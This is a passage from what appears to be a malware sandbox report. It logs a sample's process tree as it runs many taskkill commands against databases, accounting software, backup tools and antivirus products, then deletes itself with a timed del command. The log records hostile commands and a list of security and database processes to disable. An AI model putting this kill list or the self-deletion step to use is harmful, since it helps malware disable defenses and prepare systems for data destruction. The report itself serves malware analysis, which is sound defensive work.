- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBW32*2⤵PID:1852
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBW32*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBDBMgr*2⤵PID:1980
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBDBMgr*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM qbupdate*2⤵PID:1988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM qbupdate*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM axlbridge*2⤵PID:1056
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM axlbridge*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM httpd*2⤵PID:1464
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM httpd*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fdlauncher*2⤵PID:740
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fdlauncher*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MsDtSrvr*2⤵PID:1800
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MsDtSrvr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM java*2⤵PID:1732
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM java*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM 360se*2⤵PID:1580
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM 360se*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM 360doctor*2⤵PID:268
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM 360doctor*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wdswfsafe*2⤵PID:1852
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wdswfsafe*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fdhost*2⤵PID:1976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fdhost*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM GDscan*2⤵PID:1988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM GDscan*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ZhuDongFangYu*2⤵PID:1892
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ZhuDongFangYu*3⤵
- Kills process with taskkill
PID:1032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBDBMgrN*2⤵PID:1464
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBDBMgrN*3⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM mysqld*2⤵PID:740
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM mysqld*3⤵
- Kills process with taskkill
PID:1232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM AutodeskDesktopApp*2⤵PID:1800
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM AutodeskDesktopApp*3⤵
- Kills process with taskkill
PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM acwebbrowser*2⤵PID:1756
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM acwebbrowser*3⤵
- Kills process with taskkill
PID:672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Creative Cloud*2⤵PID:1624
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Creative Cloud*3⤵
- Kills process with taskkill
PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Adobe Desktop Service*2⤵PID:1880
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Adobe Desktop Service*3⤵
- Kills process with taskkill
PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM CoreSync*2⤵PID:980
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM CoreSync*3⤵
- Kills process with taskkill
PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Adobe CEF Helper*2⤵PID:1992
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Adobe CEF Helper*3⤵
- Kills process with taskkill
PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM node*2⤵PID:2028
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM node*3⤵
- Kills process with taskkill
PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM AdobeIPCBroker*2⤵PID:608
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM AdobeIPCBroker*3⤵
- Kills process with taskkill
PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sync-taskbar*2⤵PID:1392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sync-taskbar*3⤵
- Kills process with taskkill
PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sync-worker*2⤵PID:1540
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sync-worker*3⤵
- Kills process with taskkill
PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM InputPersonalization*2⤵PID:548
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM InputPersonalization*3⤵
- Kills process with taskkill
PID:788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM AdobeCollabSync*2⤵PID:1356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM AdobeCollabSync*3⤵
- Kills process with taskkill
PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM BrCtrlCntr*2⤵PID:1572
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM BrCtrlCntr*3⤵PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM BrCcUxSys*2⤵PID:1580
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM BrCcUxSys*3⤵
- Kills process with taskkill
PID:1944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SimplyConnectionManager*2⤵PID:2040
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SimplyConnectionManager*3⤵
- Kills process with taskkill
PID:2016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Simply.SystemTrayIcon*2⤵PID:512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Simply.SystemTrayIcon*3⤵
- Kills process with taskkill
PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fbguard*2⤵PID:1404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fbguard*3⤵PID:2012
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM fbserver*2⤵PID:1452
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM fbserver*3⤵PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ONENOTEM*2⤵PID:380
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ONENOTEM*3⤵
- Kills process with taskkill
PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM wrapper*2⤵PID:804
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM wrapper*3⤵
- Kills process with taskkill
PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM DefWatch*2⤵PID:1276
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM DefWatch*3⤵
- Kills process with taskkill
PID:1628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ccEvtMgr*2⤵PID:1816
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ccEvtMgr*3⤵
- Kills process with taskkill
PID:1784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM ccSetMgr*2⤵PID:1776
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM ccSetMgr*3⤵PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SavRoam*2⤵PID:1916
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SavRoam*3⤵
- Kills process with taskkill
PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Sqlservr*2⤵PID:1852
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Sqlservr*3⤵PID:1252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlagent*2⤵PID:2020
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlagent*3⤵PID:1872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqladhlp*2⤵PID:272
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqladhlp*3⤵
- Kills process with taskkill
PID:2028
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Culserver*2⤵PID:1340
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Culserver*3⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM RTVscan*2⤵PID:912
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM RTVscan*3⤵PID:1392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlbrowser*2⤵PID:1796
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlbrowser*3⤵
- Kills process with taskkill
PID:1036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLADHLP*2⤵PID:1236
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLADHLP*3⤵
- Kills process with taskkill
PID:548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBIDPService*2⤵PID:1800
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBIDPService*3⤵
- Kills process with taskkill
PID:1360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*2⤵PID:1532
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM Intuit.QuickBooks.FCS*3⤵PID:672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBCFMonitorService*2⤵PID:1552
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBCFMonitorService*3⤵
- Kills process with taskkill
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM sqlwriter*2⤵PID:1936
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM sqlwriter*3⤵
- Kills process with taskkill
PID:2040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM msmdsrv*2⤵PID:1992
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM msmdsrv*3⤵
- Kills process with taskkill
PID:512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM tomcat6*2⤵PID:1896
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM tomcat6*3⤵PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM zhudongfangyu*2⤵PID:1488
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM zhudongfangyu*3⤵
- Kills process with taskkill
PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM vmware-usbarbitator64*2⤵PID:520
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM vmware-usbarbitator64*3⤵
- Kills process with taskkill
PID:380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM vmware-converter*2⤵PID:1280
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM vmware-converter*3⤵
- Kills process with taskkill
PID:804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM dbsrv12*2⤵PID:1644
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM dbsrv12*3⤵
- Kills process with taskkill
PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM dbeng8*2⤵PID:1848
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM dbeng8*3⤵
- Kills process with taskkill
PID:1528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵PID:1572
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵
- Kills process with taskkill
PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*2⤵PID:1912
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$VEEAMSQL2012*3⤵
- Kills process with taskkill
PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*2⤵PID:1612
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$VEEAMSQL2012*3⤵
- Kills process with taskkill
PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLBrowser*2⤵PID:1060
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLBrowser*3⤵
- Kills process with taskkill
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLWriter*2⤵PID:820
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLWriter*3⤵
- Kills process with taskkill
PID:272
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM FishbowlMySQL*2⤵PID:832
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM FishbowlMySQL*3⤵PID:608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵PID:1820
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵
- Kills process with taskkill
PID:912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MySQL57*2⤵PID:1812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MySQL57*3⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*2⤵PID:1276
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*3⤵
- Kills process with taskkill
PID:1236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLServerADHelper100*2⤵PID:1732
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLServerADHelper100*3⤵
- Kills process with taskkill
PID:1800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*2⤵PID:1880
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*3⤵
- Kills process with taskkill
PID:1532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM msftesql-Exchange*2⤵PID:268
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM msftesql-Exchange*3⤵PID:468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*2⤵PID:1856
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##SSEE*3⤵
- Kills process with taskkill
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*2⤵PID:512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$SBSMONITORING*3⤵
- Kills process with taskkill
PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*2⤵PID:1404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQL$SHAREPOINT*3⤵
- Kills process with taskkill
PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*2⤵PID:1988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*3⤵PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*2⤵PID:380
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*3⤵
- Kills process with taskkill
PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*2⤵PID:804
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$SBSMONITORING*3⤵
- Kills process with taskkill
PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*2⤵PID:1760
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM SQLAgent$SHAREPOINT*3⤵PID:740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBFCService*2⤵PID:1528
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBFCService*3⤵
- Kills process with taskkill
PID:1356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C taskkill /F /T /IM QBVSS*2⤵PID:1932
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /T /IM QBVSS*3⤵
- Kills process with taskkill
PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\79385ed97732aee0036e67824de18e28.exe" /F2⤵
- Deletes itself
PID:656 -
C:\Windows\SysWOW64\timeout.exetimeout /T 15 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:672
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1500